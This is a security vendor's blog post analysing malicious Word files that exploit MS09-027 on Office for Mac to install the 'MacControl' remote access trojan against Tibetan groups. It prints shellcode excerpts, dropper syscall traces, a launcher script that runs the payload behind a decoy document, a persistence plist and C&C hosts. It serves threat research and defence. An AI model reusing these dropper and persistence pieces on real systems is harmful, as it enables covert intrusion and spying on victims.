MS Office exploit that targets MacOS X seen in the wild - delivers "Mac Control" RAT

March 27, 2012 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

Continuing our research on Tibet attacks, we have found more Mac trojans and some interesting MS Office files that  deliver them. The group behind these attacks is the same we have been tracking for a while:

- http://labs.alienvault.com/labs/index.php/2012/alienvault-research-used-as-lure-in-targeted-attacks/ [no longer available] AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

The doc files seem to exploit MS09-027 and target Microsoft Office for Mac. This is one of the few times that we have seen a malicious Office file used to deliver Malware on Mac OS X.

http://technet.microsoft.com/en-us/security/bulletin/MS09-027

A remote code execution vulnerability exists in the way that Microsoft Office Word handles a specially crafted Word file that includes a malformed record. An attacker who successfully exploits this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

When the victim opens the malicious Word file using Office for Mac, the shellcode writes the malicious payload on disk and executes it, and then opens a benign office file with the following content:

The first stage copies the payload to the __IMPORT section of dyld using memcpy:

push dword 0x1be #Payload size

push edx

push dword 0x8fe6f318

push dword 0x8fe6f318 ## dyld __IMPORT (rwx) mov ebx,0x8fe2e130 #memcpy

jmp ebx

The second stage writes necessary files to /tmp/ (bash file, benign doc file, binary) and then executes the bash script (/tmp/launch-hs):

fstat(0x2, 0xBFFF4CD0, 0x200)

...

fstat(0x24, 0xBFFF4CD0, 0x200)

lseek(0x24, 0x6600, 0x0) #File Offset on the doc file

open(”/tmp/launch-hs\0”, 0x602, 0x1FF)

open(”/tmp/launch-hse\0”, 0x602, 0x1FF)

open(”/tmp/file.doc\0”, 0x602, 0x1FF)

read(0x24, “#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0”, 0x32)

write(0x26, “#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0”, 0x32) ...

...

...

close(0x28)

vfork()

execve(0x28, 0xBFFF4B80, 0x0)

Bash file: /tmp/launch-hs:

#!/bin/sh /tmp/launch-hse & open /tmp/file.doc &

A couple of doc files drop the previous Mac Trojan we reported last week.

The only difference is the .pslist used:

<?xml version=“1.0” encoding=“UTF-8”?>

<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “http:// www.apple.com/DTDs/PropertyList-1.0.dtd”>

<plist version=“1.0”>

<dict>

<key>Label</key> <string>com.apple.docserver</string> <key>Program</key>

<string> /Applications/Automator.app/Contents/MacOS/DockLight </string>

<key>RunAtLoad</key>

<true/>

</dict>

</plist>

The C&C server this time is:

- 2012.slyip.net : 173.255.160.234

173.255.160.128 - 173.255.160.255

Black Oak Computers Inc - New York - 75 Broad Street

New York, NY, US

The second trojan found is a new one never seen. We have found several versions compiled for different architectures (ppc, i386..) .We have also found a version that has paths to debugging symbols:

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/ppc/Foundation_Hello.o

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/i386/Foundation_Hello.o

So the group seems to have a project called “longgege” and the actual trojan is named “MacControl” by them.

The trojan performs the following actions:

- Copies itself into /Library/launched

- Creates /Users/{User}/Library/LaunchAgents/com.apple.FolderActionxsl.pslist

This is the way to maintain persistence. The trojan will be executed when the computer starts.

- It then reads the configuration parameters that are at the end of the binary file:

  • - domain: freetibet2012.xicp.net - port: 80

- Establishes a connection to the host present in the configuration parameters.

-Sends some information about the victim, username, hostname, system version…

 

- The trojan will then wait for commands from the C&C.

The attackers can then send commands to the victim to open a remote shell, send files, receive files, delete files….

The C&C domain resolves to freetibet2012.xicp.net: 114.249.207.194

114.240.0.0 - 114.255.255.255

China Unicom Beijing province network

China Unicom

All the samples we have found have 0/0 rate antivirus detection, it includes the malicious doc files.

We will publish a technical analysis of the trojan capabilities and some tips to detect these threats. Stay tuned!

Thanks to Rubén Santamarta @reversemode for his help during the analysis.

 
Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL